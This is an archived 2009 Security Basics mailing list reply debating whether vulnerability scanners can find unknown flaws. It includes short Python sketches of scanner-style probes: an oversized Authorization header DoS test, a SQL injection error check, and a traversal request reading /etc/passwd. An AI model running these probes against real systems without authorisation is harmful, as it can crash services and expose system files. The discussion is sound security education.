Security Basics mailing list archives

Re: Vulnerability scanners don't work


From: security curmudgeon <jericho () attrition org>
Date: Thu, 8 Jan 2009 20:49:48 +0000 (UTC)


: Good point, I don't think that I was as clear as I could have been.  
: The truth is that vulnerability scanners do contain signatures or 
: scripts that allow them to hunt for certain types of vulnerabilities as 
: well as the specific known vulnerabilities.  But are you saying that 
: they can actually identify new vulnerabilities? I'm still saying that 
: they can't.

Absolutely, and they have. In the last 12 months, I handled a disclosure 
between the pen-test shop I recently left and Real Networks for a 
vulnerability in one of their products. A consultant ran Nessus against a 
client and ended up finding a traversal that allowed him to grab any file 
on the remote system. Likewise with AppScan, I handled several disclosures 
to vendors for a wide variety of SQLi and XSS in various products.

I'm not saying that either product found vulnerabilities the consultant 
didn't or wouldn't have, but those tools were used on every network or 
application test to set a baseline. In several cases, each found 
new vulnerabilities before the consultant began the manual testing.

I'm a little confused here as to why you are so insistent that vulnerability 
scanners can't find a new vulnerability.

: Let's take your www_too_long_auth.nasl script into consideration only 
: because it is the first one that I noticed. That script just connects 
: to a web service and blindly dumps a 2048-byte payload into the 
: authorization buffer. If the service stops responding then the script 
: tells the scanner that the service is vulnerable, but is it? If the 
: service keeps responding then the script tells the scanner that the 
: service is not vulnerable, how accurate is that? Would you consider that 
: to be positive vulnerability identification? Can we be certain that the 
: scripts are finding real, exploitable conditions and not false 
: positives?

How accurate? Accurate enough to suggest that a long string may cause a 
DoS condition.

Positive vulnerability identification? Absolutely not.

Can we be certain..? Absolutely not.
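
To make that concrete, here's a rough Python sketch of the style of check 
www_too_long_auth.nasl performs (the real plugin is written in NASL; the 
host, port, and 2048-byte blob here are made up for illustration):

    # Illustrative only: mimics the "too long Authorization header" style
    # of check. It sends an oversized header, then probes whether the
    # service still answers. A dead service is evidence of a possible DoS,
    # not proof of an exploitable flaw.
    import socket

    HOST, PORT = "192.0.2.10", 80   # assumed example target, not real

    def service_alive(timeout=5):
        try:
            with socket.create_connection((HOST, PORT), timeout=timeout) as s:
                s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
                return bool(s.recv(1))     # any byte back means it's alive
        except OSError:
            return False

    # Oversized credential blob, analogous to the plugin's 2048-char string
    payload = b"Authorization: Basic " + b"A" * 2048

    try:
        with socket.create_connection((HOST, PORT), timeout=5) as s:
            s.sendall(b"GET / HTTP/1.0\r\n" + payload + b"\r\n\r\n")
    except OSError:
        pass                               # the connection dying here is telling too

    if not service_alive():
        print("service stopped responding -- possible DoS condition")

A dead service after the oversized header is evidence of a problem; it is 
not positive identification of an exploitable flaw, which is exactly the 
point.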

I only stated that these products can find vulnerabilities, and don't 
necessarily require or rely solely on signature-based auditing. Just like a 
human doing a pen-test, the scanners have to find evidence of a 
vulnerability first. That may be in the form of a crash, an error message, 
or something else that catches the eye. Yes, vulnerability scanners are 
primitive compared to a good pen-tester; I'm not arguing that, or trying to 
say that scanners can replace humans. I am saying that vulnerability 
scanners have their place in the market for many reasons, and that the 
important part is to understand how they work, what they can find, and the 
limitations inherent in their design.
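
As a rough sketch of what that "evidence" can look like in practice, a 
scanner-style SQLi probe boils down to injecting a stray quote and watching 
the response for database error strings (the URL, parameter, and marker 
list below are invented for the example):

    # Illustrative sketch of evidence-based detection: a database error
    # string in the response is evidence worth flagging for a human, not
    # positive identification of an exploitable SQLi.
    import urllib.error
    import urllib.parse
    import urllib.request

    url = "http://192.0.2.10/item"               # assumed example target
    markers = ("SQL syntax", "ODBC", "ORA-", "unterminated quoted string")

    query = urllib.parse.urlencode({"id": "1'"})  # the stray-quote probe
    try:
        with urllib.request.urlopen(url + "?" + query, timeout=5) as resp:
            body = resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        body = err.read().decode(errors="replace")  # 500 pages often carry the error

    if any(m in body for m in markers):
        print("possible SQL injection -- needs manual verification")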

: Sure they might be able to identify a problem that might be a 
: vulnerability via the ad-hoc perl -e style testing, but in my opinion 
: that's not good enough. That is not a positive identification of a new 
: vulnerability. That is the identification of a theoretical 
: vulnerability, which isn't technically a real vulnerability until it's 
: been proved by a human, right?

Sure, just like it is with a human tester, many of whom cannot do the 
required follow-up either =) (be it for lack of time, resources, skillset, 
etc.)

: So is this inaccurate, or just unclear:
: 
: "The fact is that vulnerability scanners can not detect vulnerabilities unless
: someone has first identified the vulnerability and created a signature for its
: detection."

Inaccurate. Vulnerability scanners that use general fuzzing or common 
exploit scenarios *can* detect previously unknown vulnerabilities. That 
detection is not reliable, and it should not replace a pen-tester by any 
means.

: Perhaps I should write:
: 
: "The fact is that vulnerability scanners can not positively identify
: vulnerabilities."

Inaccurate. =) Jumping back to my example above, the vulnerability found 
in a Real product was positively identified by a scanner. It made a GET 
request to an RTSP-enabled server and grabbed /etc/passwd via a 
traversal vulnerability. The output of the vulnerability scanner made it 
very clear there was an issue, as it displayed the captured file.

What the scanner couldn't do, and the consultant did, was verify that he 
could grab other files and then share that information with me so I could 
in turn share it with the vendor.
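
For illustration only, that sort of traversal check amounts to something 
like the sketch below (the target, traversal depth, and plain HTTP are 
assumptions on my part; the actual finding was against an RTSP-enabled 
server):

    # Illustrative sketch of a traversal check: climb out of the web root
    # and look for tell-tale /etc/passwd content in the reply.
    import urllib.error
    import urllib.request

    base = "http://192.0.2.10"                 # assumed example target
    probe = "/" + "../" * 8 + "etc/passwd"     # depth of 8 is an arbitrary guess

    try:
        with urllib.request.urlopen(base + probe, timeout=5) as resp:
            body = resp.read().decode(errors="replace")
    except urllib.error.HTTPError:
        body = ""                              # a 4xx/5xx answer means no luck here

    if "root:" in body:
        print("traversal confirmed -- server returned /etc/passwd")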

: I think that "what's best" is a major part of the problem. Most people 
: don't know the difference between a vulnerability scan and a manual 
: vulnerability assessment.  Most people think that they are both the same 
: thing, same quality, etc. That's an advantage for the vulnerability scan 
: vendor, but it's a disadvantage to the people who don't know "what's 
: best".

Right, and this is the battle you and many others have fought for over a 
decade now: educating customers on what they really need when they come to 
you saying "test our systems" in so many words. If a pen-test shop has a 
good sales goon, that is the first hurdle they have to jump: identifying 
what the customer really needs, because 95% of the time the customer sure 
doesn't know.

: I'd like people to be able to make well informed decisions so that if 
: they use a vulnerability scanner they know what they are really getting. 
: The fact of the matter is that vulnerability scanners are an invaluable 
: tool with respect to maintaining the security of a network and doing 
: nightly checkups, but they are not nearly as accurate as the human 
: teams. As a result, we recommend to our customers they perform 
: vulnerability scans frequently and undergo intense manual penetration 
: testing once or twice a year.

Exactly. Most shops need a blended solution like this, and it is much more 
financially viable than an "only use a pen-test shop for real testing" 
message. Like I said, when a company has 100k machines across the org, 
vulnerability scanners certainly have their place.

: I might actually take consideration and write the article that you've 
: suggested.

You should; it definitely seems in line with previous posts about the 
quality of some pen-test teams. I'm sure you've been on a test that 
ended up finding many vulnerabilities, only to be told "what?! we had 
$company do a pen-test 3 months ago!"

